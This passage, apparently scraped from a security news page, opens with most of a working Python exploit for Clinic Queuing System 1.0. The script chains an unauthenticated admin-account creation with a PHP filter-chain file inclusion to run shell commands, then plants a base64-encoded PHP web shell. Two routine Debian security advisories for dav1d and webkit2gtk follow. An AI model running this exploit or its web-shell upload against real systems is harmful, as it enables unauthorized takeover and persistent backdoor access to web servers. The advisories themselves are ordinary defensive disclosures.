B|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Debian Linux Security Advisory 5686-1 - Nick Galloway discovered an integer overflow in dav1d, a fast and small AV1 video stream decoder which could result in memory corruption.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5686-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 09, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : dav1dCVE ID         : CVE-2024-1580Nick Galloway discovered an integer overflow in dav1d, a fast and smallAV1 video stream decoder which could result in memory corruption.For the oldstable distribution (bullseye), this problem has been fixedin version 0.7.1-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.0.0-2+deb12u1.We recommend that you upgrade your dav1d packages.For the detailed security status of dav1d please refer toits security tracker page at:https://security-tracker.debian.org/tracker/dav1dFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmY84YwACgkQEMKTtsN8TjbRiRAAvuyxl16M5vv5sRP7cBXJOG1AXtEAmw7uId5GNiRIrIPPs9JuP8fPBqxH+tasEIF7Il88KgSKDt+ZYa2R3iG57KQNjTxCvZ5XZ9rlOhb1C1Z69Qm7beYXFpTasygIteKYzvrW3qvcDvmqsYuLd8ZDIPFhLeb5XbBdm2a+vE1dhvdyYwMj+MZP2Sq7ZwCEd/ez6pKhsrZZjOWcoDeH/64CBnpNy/tpXW1KDvS0TsfWdlJbvG+3USBNaGq9rk+jc1XKcKlYmPV4VKxrlUvuWFGv+s99pPNGWhE8Xf84DlssGj2Hi+m6QUHSfqxBtf+YiArHjLPihgW8CGnNZ7vJBAjUO26pwwxZcx6AemsjyJAynqcd9c38SDDwvTZuka+mhJwZbrVcJqe5NU2jmrbzV6RpJtTzmCeZwuvSlmUxH36p9fVYhEIaeflaRtIidDnnVo2ervwAKPDfVnIt+X6bHnF6m+GGIw8I1+6RhNulUQhwivNtbGXhp/9vf3e1TmDr0awyY2yG7v2Qv1SSzQGQA4W5ARMb/DliFFZTpvRDzEp1iuVyduPO0y8bWORNhIsAjirq1DhzHBxquZY4tHBi3AfoVGO09Yh3ZE/KyMP/98P5XU3gH4xLsz3PziHH15GWSpxkcjgFblNOYdtYrp4K+8YC0fB7cuKEIWaHRO5CCgx/UHsYhW-----END PGP SIGNATURE-----

Debian Security Advisory 5686-1

Debian Linux Security Advisory 5684-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Kacper Kwapisz discovered that visiting a malicious website may lead to address bar spoofing. Nan Wang and Rushikesh Nandedkar discovered that processing maliciously crafted web content may lead to arbitrary code execution. SungKwon Lee discovered that processing web content may lead to a denial-of-service. Various other issues were also addressed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5684-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 09, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42843 CVE-2023-42950 CVE-2023-42956 CVE-2024-23252  
                 CVE-2024-23254 CVE-2024-23263 CVE-2024-23280 CVE-2024-23284

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42843

    Kacper Kwapisz discovered that visiting a malicious website may  
    lead to address bar spoofing.

CVE-2023-42950

    Nan Wang and Rushikesh Nandedkar discovered that processing  
    maliciously crafted web content may lead to arbitrary code  
    execution.

CVE-2023-42956

    SungKwon Lee discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23252

    anbu1024 discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23254

    James Lee discovered that a malicious website may exfiltrate audio  
    data cross-origin.

CVE-2024-23263

    Johan Carlsson discovered that processing maliciously crafted web  
    content may prevent Content Security Policy from being enforced.

CVE-2024-23280

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23284

    Georg Felber and Marco Squarcina discovered that processing  
    maliciously crafted web content may prevent Content Security  
    Policy from being enforced.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.44.1-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.1-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmY8e60ACgkQAAyEYu0C  
2ALK/g/7BzT5OfeZ1/2nK7TVdiyOjPuQgoZBqIV1LAmUBy5gHvKjOtrujqI9pVaU  
DZtGhgfRwu2AZjAvR1A5gCNTwWyGhvFrLN23/BaloxcveYr6iY6HuYFymlQp24fM  
o35x8DQJySgO3cGmNR1GwwLatr3dVrHh+Kot1J449G4mqlQxH4UQ8ytWOSfpWLdZ  
3ndArvVrO35eBUgPbUEooPHITSlusZQPbaVJkmU69zbpW1z220sQldSmObWHbAGG  
41NHl74LMqe64tI5EfrgSwdY7L+FEby/M0JlO37e1Hut0WpQckHuNgrlq6IO20Ed  
h80kmkN91TDCihQ1vovZaTbg9bCYcSYCWBxPGomip1v8EL1AybO8c7pEI/v/lcVO  
x4Ya6++JrJ1994U5esZB7VC0ucEUOc0SqwARyHv6NMmkKxxIPv2YdqPFE196x2Ns  
1rTM6dMriuCaKLOb2WUtOawLKPnBNQ0dRS1JLcNDA1Dy9zbDDB6ev8idKnixRMbv  
EOyZjBm8RTBK7dGw0BlTdHAoCZvczQJvinAJptvL+771qwcwq7SaL+6L1Ht1MGcN  
WS+wrb+DzpSvfprtv5Qvs0NEpmGISwbK3T/XOEnyyKMQdhemNtpvjWvF+0WNBf/d  
3nPAa5F9ZxJJMEuJFjAmm/HiK3R6Uko899yBtNbDkJbbA+vQlM8=MdSz  
-----END PGP SIGNATURE-----

Tag

#linux